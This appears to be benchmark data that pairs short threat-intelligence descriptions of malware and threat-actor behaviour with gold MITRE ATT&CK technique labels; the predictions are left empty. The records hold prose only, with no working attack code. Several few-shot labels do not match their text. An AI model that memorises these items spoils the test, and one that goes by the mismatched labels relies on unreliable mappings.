associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ZxShell is injected into a shared SVCHOST process.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: Figure 5 shows Phishery\u2019s output to the command that injects a URL into a file named \u201cgood_test.docx\u201d, which it will save the resulting file to \u201cbad_test.docx\u201d\n\t - T1055: Process Injection\n- Text: FoggyWeb's loader has reflectively loaded .NET-based assembly/payloads into memory.\n\t - T1620: Reflective Code Loading\n", + "input": "PowerSploit contains a collection of CodeExecution modules that inject code (DLL, shellcode) into a process.", + "gold": "- T1055.001: Process Injection - Dynamic-link Library Injection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Duqu examines running system processes for tokens that have specific system privileges. If it finds one, it will copy the token and store it for later use. Eventually it will start new processes with the stored token attached. It can also steal tokens to acquire administrative privileges.\n\t - T1134: Access Token Manipulation\n- Text: Aria-body has the ability to execute a process using \"runas\".\n\t - T1134.002: Access Token Manipulation - Create Process with Token\n- Text: Peirates can use stolen service account tokens to perform its operations. It also enables adversaries to switch between valid service accounts.\n\t - T1550.001: Use Alternate Authentication Material - Application Access Token\n", + "input": "MegaCortex can enable \"SeDebugPrivilege\" and adjust token privileges.", + "gold": "- T1134: Access Token Manipulation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems.\n\t - T1187: Forced Authentication\n- Text: The FTP account information used in the malware can expose the C&C server to attacks. The string \u2018victory\u2019 used in the password has also been found in the b374k webshell used by the Kimsuky group\n\t - T1598.003: Phishing for Information - Spearphishing Link\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n\t - T1027: Obfuscated Files or Information\n- Text: The case we found arrived through a targeted email that contained a document file (in docx format).\n\t - T1598.002: Phishing for Information - Spearphishing Attachment\n", + "input": "Dragonfly has performed forced authentication to gather hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems.", + "gold": "- T1187: Forced Authentication", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The screenshots included remote desktop (RDP) sessions showing the Glimpse panel, a web browser session displaying a C2 panel called Scarecrow, web browser sessions into VPS administrative panels, and evidence of potential destructive attacks against OilRig servers\n\t - T1113: Screen Capture\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n\t - T1505.003: Server Software Component - Web Shell\n- Text: Lazarus Group used SSH and the PuTTy PSCP utility to gain access to a restricted segment of a compromised network.\n\t - T1021.004: Remote Services - SSH\n- Text: GCMAN uses VNC for lateral movement.\n\t - T1021.005: Remote Services - VNC\n", + "input": "Fox Kitten has installed web shells on compromised hosts to maintain access.", + "gold": "- T1505.003: Server Software Component - Web Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: OopsIE uses the command prompt to execute commands on the victim's machine.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: A Python script was created for the purpose of automating this configuration file decoding process. The output of this script when run against the configuration file used by the first of the two Parliamentarian operation samples yielded the following data\n\t - T1059.006: Command and Scripting Interpreter - Python\n- Text: Use of obfuscated shellcode executed via PowerShell to download a \"reverse_tcp\" payload from Metasploit onto victim systems\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", + "input": "PUNCHBUGGY can download additional files and payloads to compromised hosts.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bazar can identify the installed antivirus engine.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: The Cobalt Strike System Profiler can discover applications through the browser and identify the version of Java the target has.\n\t - T1518: Software Discovery\n- Text: Indrik Spider used PsExec to leverage Windows Defender to disable scanning of all downloaded files and to restrict real-time monitoring.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n", + "input": "Operation Wocao has used scripts to detect security software.", + "gold": "- T1518.001: Software Discovery - Security Software Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Operation Wocao has used a custom collection method to intercept two-factor authentication soft tokens.\n\t - T1111: Multi-Factor Authentication Interception\n- Text: DarkVishnya used network sniffing to obtain login data.\n\t - T1040: Network Sniffing\n- Text: Leafminer used a tool called Total SMB BruteForcer to perform internal password spraying.\n\t - T1110.003: Brute Force - Password Spraying\n", + "input": "Kimsuky has used a proprietary tool to intercept one time passwords required for two-factor authentication.", + "gold": "- T1111: Multi-Factor Authentication Interception", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Stuxnet collects the IP address of a compromised system.\n\t - T1016: System Network Configuration Discovery\n- Text: Ramsay can use \"netstat\" to enumerate network connections.\n\t - T1049: System Network Connections Discovery\n- Text: Cobalt Strike can identify targets by querying account groups on a domain contoller.\n\t - T1069.002: Permission Groups Discovery - Domain Groups\n", + "input": "Higaisa used \"ipconfig\" to gather network configuration information.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The APT actor has been observed using Cisco AnyConnect Secure Socket Layer (SSL) virtual private network (VPN) connections to enable remote logins on at least one victim network, possibly enabled by an Exim Simple Mail Transfer Protocol (SMTP) vulnerability (CVE 2019-10149) (External Remote Services [T1133]). More recently, the APT actor enumerated and exploited a Fortinet VPN vulnerability (CVE-2018-13379) for Initial Access [TA0001] and a Windows Netlogon vulnerability (CVE-2020-1472) to obtain access to Windows Active Directory (AD) servers for Privilege Escalation [TA0004] within the network (Valid Accounts [T1078]). These vulnerabilities can also be leveraged to compromise other devices on the network (Lateral Movement [TA0008]) and to maintain Persistence [TA0003\n\t - T1133: External Remote Services\n\t - T1210: Exploitation of Remote Services\n- Text: APT29 has exploited CVE-2021-36934 to escalate privileges on a compromised host.\n\t - T1068: Exploitation for Privilege Escalation\n- Text: Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from DCSync/NetSync.\n\t - T1003.006: OS Credential Dumping - DCSync\n", + "input": "FIN7 has exploited ZeroLogon (CVE-2020-1472) against vulnerable domain controllers.", + "gold": "- T1210: Exploitation of Remote Services", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BRONZE UNION appears to use a combination of self-registered IP addresses and commercial VPN services in its command and control (C2) and operational infrastructure. The threat actors also integrate infrastructure they likely previously compromised for espionage purposes. For example, CTU researchers identified the group using IP addresses owned by several, presumably compromised, research organizations to interact with web shells in other target environments\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n- Text: secretsdump.py: Performs various techniques to dump secrets from the remote machine without executing any agent there. For DIT files, we dump NTLM hashes, Plaintext credentials (if available) and Kerberos keys using the DL_DRSGetNCChanges() method. It can also dump NTDS.dit via vssadmin executed with the smbexec/wmiexec approach. mimikatz.py: Mini shell to control a remote mimikatz RPC server developed by @gentilkiwi\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n\t - T1003.003: OS Credential Dumping - NTDS\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: A module in Prikormka collects passwords stored in applications installed on the victim.\n\t - T1555: Credentials from Password Stores\n", + "input": "CosmicDuke collects Windows account hashes.", + "gold": "- T1003.002: OS Credential Dumping - Security Account Manager", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bundlore has used \"openssl\" to decrypt AES encrypted payload data. Bundlore has also used base64 and RC4 with a hardcoded key to deobfuscate data.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Ixeshe uses custom Base64 encoding schemes to obfuscate command and control traffic in the message body of HTTP requests.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: The response to this request is hidden in the source code of following Flickr lookalike page\n\t - T1001: Data Obfuscation\n", + "input": "SideTwist can decode and decrypt messages received from C2.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: These two files, keyword_parm.txt and parm.txt contain instructions for MESSAGETAP to target and save contents of SMS messages\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: Zebrocy has used a method similar to RC4 as well as AES for encryption and hexadecimal for encoding data before exfiltration.\n\t - T1560: Archive Collected Data\n- Text: WindTail has the ability to use the macOS built-in zip utility to archive files.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n", + "input": "Mustang Panda has encrypted documents with RC4 prior to exfiltration.", + "gold": "- T1560.003: Archive Collected Data - Archive via Custom Method", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The document contains an encoded Visual Basic Script (VBScript) typical of previous Carbanak malware. Recent samples of the malware have now included the ability to use Google services for command-and-control (C&C) communication. The module is base64 encoded inside the main VBScript file along with various other VBScript modules used by the malware. When we analyzed the script we noticed that it is capable of using Google services as a C&C channel. Abusing Google for C&C communication . The \"ggldr\" script will send and receive commands to and from Google Apps Script, Google Sheets, and Google Forms services. It is unlikely that these hosted Google services are blocked by default in an organization, so it is more likely that the attacker will establish a C&C channel successfully. Upon the first attempt to contact the hard-coded Google Apps Script URL with the user's unique infection ID, the C&C will state that no spreadsheet currently exists for the user. The malware will then send two requests to another hard-coded Google Forms URL which will result in the creation of unique Google Sheets spreadsheet and Google Form IDs for the victim. The second time the Google Apps Script is requested, the C&C will return the unique Google Sheet and Google Form ID values: The \"entry\" value is also a unique ID which is sent with each subsequent Google Forms C&C request. Using Google as an independent C&C channel is likely to be more successful than using newly created domains or domains with no reputation\n\t - T1102.002: Web Service - Bidirectional Communication\n- Text: Zebrocy uses cmd.exe to execute commands on the system.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: The attacker then executed a persistent malicious PowerShell code that was used to download and execute another PowerShell backdoor file in the server from the malicious IP address 185[.]82[.]219[.]201, as shown in Figure 7.\n\t - T1590.005: Gather Victim Network Information - IP Addresses\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1027.003: Obfuscated Files or Information - Steganography\n\t - T1216: System Script Proxy Execution\n\t - T1546.013: Event Triggered Execution - PowerShell Profile\n\t - T1059: Command and Scripting Interpreter\n\t - T1064: Scripting\n", + "input": "RogueRobin uses Windows Script Components.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: DanBot has been distributed within a malicious Excel attachment via spearphishing emails.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: Bisonal has relied on users to execute malicious file attachments delivered via spearphishing emails.\n\t - T1204.002: User Execution - Malicious File\n- Text: APT33 sent spear phishing emails to employees whose jobs related to the aviation industry. These emails included recruitment themed lures and contained links to malicious HTML application (.hta) files. The .hta files contained job descriptions and links to legitimate job postings on popular employment websites that would be relevant to the targeted individuals\n\t - T1566.002: Phishing - Spearphishing Link\n\t - T1204.001: User Execution - Malicious Link\n", + "input": "menuPass has sent malicious Office documents via email as part of spearphishing campaigns as well as executables disguised as documents.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Crutch has the ability to persist using scheduled tasks.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: Several files were downloaded to our Struts2 honeypot from the Chinese repository site gitee.com for a user named \"c-999. Around the same time, we observed similar activity pulling down files from a gitlab.com repository page for a user named \"c-18. All the repositories had a folder called \"ss\" that contained 16 files. The files were a collection of ELF executables, shell scripts, and text files that execute a variety of actions, including achieving persistence and the execution of an illicit cryptocurrency miner. Once the threat actor had compromised a system, they achieved persistence on the device by installing a cron job that downloads and executes a file \"logo.jpg\" from \"3389[.]space. This file is a shell script which, in turn, downloads mining executables from the threat actor's Git repositories and saves them under the filename \"java. The exact file downloaded depends on the victim's system architecture\n\t - T1053.003: Scheduled Task/Job - Cron\n- Text: This differs from the previous OopsIE variant that used a hardcoded task name for the scheduled task\n\t - T1053: Scheduled Task/Job\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n", + "input": "Dyre has the ability to achieve persistence by adding a new task in the task scheduler to run every minute.", + "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: uses search order hijacking of the Windows executable sysprep.exe to escalate privileges.\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n- Text: Empire contains modules that can discover and exploit search order hijacking vulnerabilities.\n\t - T1574.008: Hijack Execution Flow - Path Interception by Search Order Hijacking\n- Text: APT32 ran legitimately-signed executables from Symantec and McAfee which load a malicious DLL. The group also side-loads its backdoor by dropping a library and a legitimate, signed executable (AcroTranscoder).\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n", + "input": "BackdoorDiplomacy has executed DLL search order hijacking.", + "gold": "- T1574.001: Hijack Execution Flow - DLL Search Order Hijacking", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PsExec has the ability to remotely create accounts on target systems.\n\t - T1136.002: Create Account - Domain Account\n- Text: ServHelper has created a new user and added it to the \"Remote Desktop Users\" and \"Administrators\" groups.\n\t - T1136.001: Create Account - Local Account\n- Text: AADInternals can create a backdoor by converting a domain to a federated domain which will be able to authenticate any user across the tenant. AADInternals can also modify DesktopSSO information.\n\t - T1484.002: Domain or Tenant Policy Modification - Trust Modification\n", + "input": "Empire has a module for creating a new domain user if permissions allow.", + "gold": "- T1136.002: Create Account - Domain Account", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cannon uses SMTP/S and POP3/S for C2 communications by sending and receiving emails.\n\t - T1071.003: Application Layer Protocol - Mail Protocols\n- Text: Volexity has identified multiple new attack campaigns being launched by OceanLotus via multiple fake websites and Facebook pages that have been set up within the last year. In addition to targeting those within Vietnam, Volexity has seen renewed targeting of OceanLotus's neighbors throughout Southeast Asia. These websites have been observed profiling users, redirecting to phishing pages, and being leveraged to distribute malware payloads for Windows and OSX. This post will focus on one of the larger campaigns where OceanLotus has leveraged multiple fake news websites to target users\n\t - T1585.001: Establish Accounts - Social Media Accounts\n- Text: POORAIM has used AOL Instant Messenger for C2.\n\t - T1102.002: Web Service - Bidirectional Communication\n", + "input": "DropBook can communicate with its operators by exploiting the Simplenote, DropBox, and the social media platform, Facebook, where it can create fake accounts to control the backdoor and receive instructions.", + "gold": "- T1102: Web Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Aoqin Dragon has run scripts to identify file formats including Microsoft Word.\n\t - T1083: File and Directory Discovery\n- Text: Kimsuky has checked for the presence of antivirus software with \"powershell Get-CimInstance -Namespace root/securityCenter2 \u2013 classname antivirusproduct\".\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: FlawedAmmyy will attempt to detect if a usable smart card is current inserted into a card reader.\n\t - T1120: Peripheral Device Discovery\n", + "input": "SideTwist has the ability to search for specific files.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Gamaredon Group has used `mshta.exe` to execute malicious HTA files.\n\t - T1218.005: System Binary Proxy Execution - Mshta\n- Text: SodaMaster has the ability to download additional payloads from C2 to the targeted system.\n\t - T1105: Ingress Tool Transfer\n- Text: Gamaredon Group malware can insert malicious macros into documents using a \"Microsoft.Office.Interop\" object.\n\t - T1559.001: Inter-Process Communication - Component Object Model\n", + "input": "POWERSTATS can use Mshta.exe to execute additional payloads on compromised hosts.", + "gold": "- T1218.005: System Binary Proxy Execution - Mshta", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Endpoint Protection . Patchwork cyberespionage group expands targets from governments to wide range of industries . The Patchwork attack group has been targeting more than just government-associated organizations. Symantec Security Response has been actively monitoring Patchwork, also known as Dropping Elephant, which uses Chinese-themed content as bait to compromise its targets\u2019 networks. A customized website with content related to the Chinese military . The malicious sites link to files hosted on different domains, which appear to be solely used for malicious purposes. The PowerPoint files appear to exploit the Microsoft Windows OLE Package Manager Remote Code Execution Vulnerability (CVE-2014-4114), which was used in the Sandworm attacks against American and European targets in October 2014. The rich text files typically attempt to exploit the Microsoft Office Memory Corruption Vulnerability (CVE-2015-1641), which was patched in April 2015. Users should manually remove any potential dropped files which would typically be named \u201csysvolinfo.exe\u201d. Malicious Word .doc file Besides the .pps file, the threat actor uses rich text files to deliver the malware. While other researchers have reported that these files exploit CVE-2012-0158, Symantec has also observed CVE-2015-1641 being exploited to drop Backdoor.Steladok. As two file types are used to deliver two different payloads, there are likely multiple individuals or groups contributing to the malware development efforts. Mitigation Users should adhere to the following advice to prevent Patchwork\u2019s attacks from succeeding: - Delete any suspicious-looking emails you receive, especially if they contain links or attachments. Spear-phishing emails are frequently used by cyberespionage attackers as a means of luring victims into opening malicious files\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: Axiom has used spear phishing to initially compromise victims.\n\t - T1566: Phishing\n- Text: sent shortened URL links over email to victims. The URLs linked to Word documents with malicious macros that execute PowerShells scripts to download Pupy.\n\t - T1598.003: Phishing for Information - Spearphishing Link\n", + "input": "GuLoader has been spread in phishing campaigns using malicious web links.", + "gold": "- T1566.002: Phishing - Spearphishing Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: GoldenSpy can execute remote commands via the command-line interface.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: The second file is a PowerShell script which appears to be based on a Rapid7 Ruby Exploitation script that loads arbitrary shellcode\n\t - T1059: Command and Scripting Interpreter\n\t - T1064: Scripting\n- Text: The attacker made use of Cobalt Strike\u2019s \u201cpsexec\u201d lateral movement command to create a Windows service named with a random 16-character string on the target system and execute encoded PowerShell\n\t - T1546.013: Event Triggered Execution - PowerShell Profile\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", + "input": "Chimera has used the Windows Command Shell and batch scripts for execution on compromised hosts.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: InvisiMole has deleted files and directories including XML and files successfully uploaded to C2 servers.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: PowerDuke has commands to get the current directory name as well as the size of a file. It also has commands to obtain information about logical drives, drive type, and free space.\n\t - T1083: File and Directory Discovery\n- Text: cleared Windows event logs and other logs produced by tools they used, including system, security, terminal services, remote services, and audit logs. The actors also deleted specific Registry keys.\n\t - T1070: Indicator Removal\n", + "input": "BackConfig has the ability to remove files and folders related to previous infections.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The threat actor accomplished this by using administrative accounts to connect via SMB to targeted users, and then copy their Chrome profile directories as well as data protection API (DPAPI) data. In Windows, Chrome cookies and saved passwords are encrypted using DPAPI\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n- Text: Stolen Pencil has a tool to add a Windows admin account in order to allow them to ensure continued access via RDP.\n\t - T1078.003: Valid Accounts - Local Accounts\n- Text: CreepySnail can use stolen credentials to authenticate on target networks.\n\t - T1078.002: Valid Accounts - Domain Accounts\n", + "input": "Emotet leverages the Admin$ share for lateral movement once the local admin password has been brute forced.", + "gold": "- T1021.002: Remote Services - SMB/Windows Admin Shares", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The TrickBot modules used for discovery include networkdll and psfin. TrickBot downloads modules for collecting local system information and scouting the network, primarily part of the networkdll module. This module has a battery of command line, WMI and LDAP queries to gather information, and then exfiltrate the data to GRIM SPIDER for review. 